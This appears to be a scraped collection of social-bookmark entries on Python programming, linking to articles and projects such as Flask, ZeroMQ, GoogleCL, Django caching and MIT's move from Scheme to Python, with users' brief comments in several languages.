When you talk about “text,” you’re probably thinking of “characters and symbols on my computer screen.” But computers don’t deal in characters and symbols; they deal in bits and bytes. Every piece of text you’ve ever seen on a computer screen is actually stored in a particular character encoding. Very roughly speaking, the character encoding provides a mapping between the stuff you see on your screen and the stuff your computer actually stores in memory and on disk. There are many different character encodings, some optimized for particular languages like Russian or Chinese or English, and others that can be used for multiple languages. In reality, it’s more complicated than that. Many characters are common to multiple encodings, but each encoding may use a different sequence of bytes to actually store those characters in memory or on disk. So you can think of the character encoding as a kind of decryption key.
Everything you thought you knew about strings is wrong.
also about UTF-32, UTF-16, UTF-8
Flashbake: Free version-control for writers using git - Boing Boing
Leonard uses Tiddlywiki for worldcreation; I'd be curious whether any authors are now using Flashbake
Even Cory Doctorow's using Git .)
are you colorized? @ — is useful method of sharing the programming code with your friends and colleagues. Every dump automatically highlighted with respect to choosen language. — это удобный способ поделиться фрагментами кода с вашими друзьями и коллегами. Каждый дамп автоматически раскрашивается в соответствии с выбранным языком.
ZSFA -- Son Of Sam Email Server
At its core SoS is just a Python based SMTP server that can receive emails, process them using handlers based on routing regex, and then relay results out again using templates. All of this is done without using alias files, m4 macros, pipes, weird protocols, or duplicate processing of the emails. SoS just works like a flexible scripting language SMTP should operate.
Zed's nice and simple little Python-based SMTP server that dispatches to handlers much like a modern web framework, and uses Mako templates. Can relay to postfix and the like for big volume.
programmable python mail server
A Python based SMTP server that can receive emails, process them using handlers based on routing regex, and then relay results out again using templates.
This looks very exciting! I love email based services b/c it is such a great interface for users, so this seems like it could prove to reinvigorate email as a platform, which seems like the future.
gmapcatcher - Project Hosting on Google Code
GMapCatcher is an offline maps viewer. It downloads tiles automatically from many providers such as: CloudMade, OpenStreetMap, Yahoo Maps, Google Map. It displays them using a custom GUI. User can view the maps while offline. GMapCatcher doesn't depend on google-map's java scripts so it should work even if google changes them. It also provides a downloading tool. GMapCatcher is written in Python 2.6, can run on Linux, Windows and Mac OSX.
GMapCatcher is an offline maps viewer. It downloads tiles automatically from many providers such as: CloudMade, OpenStreetMap, Yahoo Maps, Google Map. It displays them using a custom GUI. User can view the maps while offline. GMapCatcher doesn't depend on google-map's java scripts so it should work even if google changes them. It also provides a downloading tool. GMapCatcher is written in Python 2.6, can run on Linux, Windows and Mac OSX.
GMapCatcher is an offline maps viewer - Project Hosting on Google Code #DS
convert maps on line - off line
Offline Google maps viewer
Django Conventions Project | Surfing in Kansas
Django conventions
Welcome to my project on Django Conventions. Below I will try and lay out a list of basic conventions that should be used when creating Reusable Django Applications. Nobody is going to force you to follow these rules, but I think that they will be a good reference point for Best Practices and Conventions. Please contact me if you have any questions or leave comments below. If this page is useful, please feel free to suggest more conventions that are applicable.
Drop-dead simple Django caching - Die in a Fire - Eric Florenzano’s Blog
Caching is easy to screw up. Usually it's a manual process which is error-prone and tedious. It's actually quite easy to cache, but knowing when to invalidate which caches becomes a lot harder. There is a subset of caching the caching problem that, with Django, can be done quite easily. The underlying idea is that every Django model has a primary key, which makes for an excellent key to a cache. Using this basic idea, we can cover a fairly large use case for caching, automatically, in a much more deterministic way. Let's begin.
some sample caching code
Learn Python The Hard Way: Learn Python The Hard Way
For non-programmers.
Convert HTML to PDF | Online HTML to PDF API
Online service Pdfcrowd turns any web site into PDF format easily with a variety of options, including the ability to set margins, encrypt files, or disable copying and printing. We've covered services and browser extensions like this site before, but Pdfcrowd's got a lot more options that set it apart. The service is relatively straightforward. You've got a variety of ways to input your source: you can enter a URL, upload a HTML or TXT file (TXT is not officially supported, but it works), or enter HTML code directly. If you choose to enter HTML code, Pdfcrowd translates the code into PDF for you, and there's a WSISWYG editor available for making tweaks. After you set your options, hit the button to convert your file. Pdfcrowd does the job, but it does append "" to your PDF in the the bottom right-hand corner. If that doesn't bother you, you might want to check out the webapp.
PDF to HTML Conversions :: Python 3.0 makes a big break
"Developers hate it when a new version of a language doesn't work with the code written for older versions of that language, but for van Rossum, the radical upgrade was necessary. The language was becoming ever more weighed down by multiple ways of doing the same task, and ways of doing tasks no one ever actually did."
Typically, each new version of the Python programming language has been gentle on users, more or less maintaining backward compatibility with previous versions. But in 2000, when Python creator Guido van Rossum announced that he was embarking on a new version of Python, he did not sugar coat his plan: Version 3.0 would not be backward-compatible. Now that the first release candidate of Python 3.0 is out, with final release planned for later this month, developers must grapple with the issue of whether to maintain older code or modify it to use the new interpreter.
プログラマーに最適なデータマイニングの教科書 『集合知プログラミング』 - 図書館情報学を学ぶ
- 図書館情報学を学ぶ “Default” templates in Django
If yo
WSGI middleware is awesome, and Django should use it more - Eric Florenzano's Website
how to debug runaway django apps, amongst other things, using WSGI middleware from repoze.
Abstract Heresies: You knew I'd say something.
An exhaustive exploration of recursion, tail calls and TCO
Rails versus Django ·
neutral, non-inflammatory comparison on rails and django
Can't help it — I like these sorts of comparisons, even if they're highly contentious.
Rails versus Django
Welcome to Flask — Flask v0.1 documentation
Sinatra っぽい。
A microframework for Python based on Werkzeug and Jinja 2. Posted Micro Blog and Twitter Clone makes among other things..
Flask is a microframework for Python based on Werkzeug, Jinja 2 and good intentions. And before you ask: It's BSD licensed!
Scheduled Tasks With Cron for Python - Google App Engine - Google Code
manual for defining web services to run - schedule tells when to run which URLs and how often to do it
Use Google app engine to run server-side web scripts regularly - as per suggestion in
cron: - description: daily summary job url: /tasks/summary schedule: every 24 hours
Cassandra By Example | Rackspace Cloud Computing & Hosting
Maybe I should learn to use Cassandra someday.
David Ziegler's Blog - A Python Script to Automatically Extract Excerpts From Articles
I recently had to write a script that takes a link to an article and returns a title and brief excerpt or description of that article
I recently had to write a script that takes a link to an article and returns a title and brief excerpt or description of that article. Ideally, the excerpt should be the first few sentences from the body of the article.
I recently had to write a script that takes a link to an article and returns a title and brief excerpt or description of that article. Ideally, the excerpt should be the first few sentences from the body of the article. The first thing I struggled with was something I thought would be trivial: fetching the contents of the webpage.
Constraint programming in Python — The Uswaretech Blog - Django Web Development
Mind Map Flash Viewer
MindMap da Linguagem python 2.5, no formato flash.
Python language map
The Swinger « Music Machinery
Swinger uses the new Dirac time-stretching capabilities of Echo Nest remix.
fun software hack that takes any song and makes it swing...with examples
Stretches the first half of each beat and shrinks the latter. Via
HOLY SHIT! The Swinger is a bit of python code that takes any song and makes it swing. It does this be taking each beat and time-stretching the first half of each beat while time-shrinking the second half. It has quite a magical effect.
Django Advent
new version, new story
Plurk Comet: Handling of 100.000+ open connections - amix blog
comet (and th
est was received it either got returned if it had data to return or stored with a timeout (the timeout was adde
Featured Download: GDataCopier Syncs Google Docs to Your Desktop
Sincroniza google docs com o desktop
Python программирование: Полезные ссылки
Набор ссылок на русскоязычные ресурсы о python
Сайт о python программировании
Dan Weinreb’s blog » Blog Archive » Why Did M.I.T. Switch from Scheme to Python?
Why Did M.I.T. Switch from Scheme to Python?
The freshman software engineering course (...) is now nearly thirty years old. Engineering has changed quite a lot in thirty years. Since 1995, Gerry and his co-author Prof. Hal Abelson have advocated changing the freshman curriculum radically, not basing it on SICP. In 1980, computer engineering was based on starting with clearly-defined things (primitives or small programs) and using them to build larger things that ended up being clearly-defined. Composition of these fragments was the name of the game. However, nowadays, a real engineer is given a big software library, with a 300-page manual that’s full of errors. He’s also given a robot, whose exact behavior is extremely hard to characterize (what happens when a wheel slips?).
"In 1980, computer engineering was based on starting with clearly-defined things (primitives or small programs) and using them to build larger things that ended up being clearly-defined. Composition of these fragments was the name of the game... Nowadays, a real engineer is given a big software library, with a 300-page manual that’s full of errors. He’s also given a robot, whose exact behavior is extremely hard to characterize (what happens when a wheel slips?). The engineer must learn to perform scientific experiments to find out how the software and hardware actually work, at least enough to accomplish the job at hand. We may not like it this way (”because we’re old fogies”), but that’s the way it is..."
Dan Weinreb’s blog » Blog Archive » Why Did M.I.T. Switch from Scheme to Python?
Some explanation of why MIT switched from Scheme to Python.
django-html - Google Code
Want html form tags using a django form? This is what you need
Allows setting doctype and avoiding self-closing tags in forms, for HTML4. I'm finding Django's insistence on XHTML-style self-closing form tags quite annoying.
django html
This package represents an experimental approach to improving the way Django outputs form widgets. At the moment, widgets created using django.forms are outputted as XHTML (with self closing /> tags) even if the rest of your site uses HTML. This package solves this problem by introducing two new template tags: {% doctype %} and {% field %}.
<p>Some nice template tags for getting django forms to output valid html instead of the default xhtml. Nice for sites where you're working with html 4.</p>
django-gae2django - Google Code
gae2django is a Django helper application that provides an implementation of Google's App Engine API based on pure Django. The helper makes it easier to re-use applications originally designed for Google's App Engine environment in a Django environment. (If you want to run existing Django applications in Google's App Engine environment, then Google App Engine Helper for Django is the right choice for you...) - Full-text searching in Django with PostgreSQL and tsearch2
mmalone's django-caching at master - GitHub
"Mike Malone shares code used by Pownce to add QuerySet level caching to Django. It’s a smart implementation—a CachingQuerySet class inspects the arguments passed to get(), and if they’re just a straight forward exact PK lookup hits memcache for the object before hitting the database. Signals are used to invalidate the cache."
Some examples of transparently caching things in Django. An example Django app that uses custom managers, fields, and QuerySets to transparently cache objects.
Some examples of transparently caching things in Django.
mmalone's django-caching app
Doug Hellmann: Writing Technical Documentation with Sphinx, Paver, and Cog
Writing Technical Documentation with Sphinx, Paver, and Cog.
I knew in the back of my mind that Doug Hellman had a sphinx workflow for his blog posts. Now, how did I not notice how close it was to my needs? Includes lots of tasty tips for tweaking output etc
"Writing Technical Documentation with Sphinx, Paver, and Cog I've been working on the Python Module of the Week series since March of 2007. During the course of the project, my article style and tool chain have both evolved. I now have a fairly smooth production process in place, so the mechanics of producing a new post don't get in the way of the actual research and writing. Most of the tools are open source, so I thought I would describe the process I go through and how the tools work together."
Streaming: Monty Python Puts Free Videos Online, Sells 23,000% More DVDs
Like it says in the title.
Monty Python started a YouTube channel with tons of their sketches streaming for free. They included links to their DVDs at Amazon. The result was a whopping 23,000% increase in sales.
cloudcourse - Project Hosting on Google Code
CloudCourse is a course scheduling system. Built entirely on App Engine, CloudCourse allows anyone to create and track learning activities. It also offers calendaring, waitlist management and approval features.
Cloudcourse: • provide a course scheduling system fully integrated with Google services • demonstrate what it takes to built an application using App Engine
Built entirely on App Engine, CloudCourse allows anyone to create and track learning activities. It also offers calendaring, waitlist management and approval features.
googlecl - Project Hosting on Google Code
Command line tools for the Google Data APIs
GoogleCL brings Google services to the command line.
"GoogleCL brings Google services to the command line."
command line interface to google services
googlecl brings Google services to the command line "google calendar today # List events for today only"
command line tool for manipulating calendar, contacts, etc. was just arguing w/ a coworker over not wanting to use google calender for my textual, scripty, unixy personal process for managing calendar commitments. this could be the bridge
Introducing the Google Command Line Tool - Google Open Source Blog
Introducing the Google Command Line Tool - Google Open Source Blog
Ever wanted to upload a folder full of photos to Picasa from a command prompt? We did, a lot, last summer. It made us want to say: $ google picasa create --title "My album" ~/Photos/vacation/*.jpg So we wrote a program to do that, and a whole lot more. GoogleCL is a command-line utility that provides access to various Google services. It streamlines tasks such as posting to a Blogger blog, adding events to Calendar, or editing documents on Google Docs.
Nicholas Piël » ZeroMQ an introduction
ZeroMQ is a messaging library, which allows you to design a complex communication system without much effort.
ZeroMQ is a messaging library, which allows you to design a complex communication system without much effort. It has been wrestling with how to effectively describe itself in the recent years. In the beginning it was introduced as ‘messaging middleware’ later they moved to ‘TCP on steroids’ and right now it is a ‘new layer on the networking stack’. I had some trouble understanding ZeroMQ at first and really had to reset my brain. First of all, it is not a complete messaging system such as RabbitMQ or ActiveMQ. I know the guys of Linden Research compared them, but it is apples and oranges. A full flexed messaging system gives you an out of the box experience. Unwrap it, configure it, start it up and you’re good to go ones you have figured out all its complexities. ZeroMQ is not such a system at all; it is a simple messaging library to be used programmatically. It basically gives you a pimped socket interface allowing you to quickly build your own messaging system.
Libreria para comunicaciones
I had some trouble understanding ZeroMQ at first and really had to reset my brain. First of all, it is not a complete messaging system such as RabbitMQ or ActiveMQ. I know the guys of Linden Research compared them, but it is apples and oranges. A full flexed messaging system gives you an out of the box experience. Unwrap it, configure it, start it up and you’re good to go once you have figured out all its complexities. ZeroMQ is not such a system at all; it is a simple messaging library to be used programmatically. It basically gives you a pimped socket interface allowing you to quickly build your own messaging system.
#ZeroMQ an introduction - #python #messaging
A fast, fuzzy, full-text index using Redis | is entirely based on a data-structure server called Redis. Redis is one of several new key-value databases which break away from traditional relational data architecture. It is simple, flexible, and blazingly fast. So why not use the tools we have already?
redis.smembers("word:" + metaphone("python"))
Interesting post about being able to search data in redis using indexing and phonetic algorthms.
typhoonae - Project Hosting on Google Code
The TyphoonAE project aims at providing a full-featured and productive serving environment to run Google App Engine (Python) applications. It delivers the parts for building your own scalable App Engine while staying compatible with Google's API.
Howto run GAE without the cloud.
cells. A massively multi-agent Python programming game. « Phonons
cells. A massively multi-agent Python programming game. « Phonons
cells. A massively multi-agent Python programming game. « Phonons
ExampleScripts - googlecl - Example commands and tasks GoogleCL can do. - Project Hosting on Google Code
This will be useful once they get GReader
Command line tools for the Google Data APIs
Google CL is a Python (Python) application that makes Google Data API calls through the command line.
cells. A massively multi-agent Python programming game. « Phonons - articles - Django 1.2 on Google App Engine
curl -L -o google-app-engine-django.tar.gz
PyFilesystem 0.3 released
Not sure this is worth another library
A Python module that provides a common interface to many kinds of filesystem.
Sweet, just what I needed: PyFilesystem 0.3 released -
Stashboard: The open source status dashboard
Stashboard: The open source status dashboard – Antonio Lupetti (Woork)
RT @Woork: Stashboard: The open source status dashboard
Stashboard is a status dashboard for APIs and software services. It's similar to the Amazon AWS Status Page or the Google Apps Status Page. Stashboard was originally written by Twilio to provide status information on its Voice and SMS APIs. Stashboard is designed to provide a generic status dashboard for any hosted service or API. The code can be downloaded, customized, and run on any Google App Engine account.
Django by Example: Django Tutorials - Django by Example
Django by Example: Django Tutorials - Django by Example
good examples of Django apps
A Coder's Musings: Curve fitting with Pyevolve
Genetic algorithms with Python
genetic algorithm lib use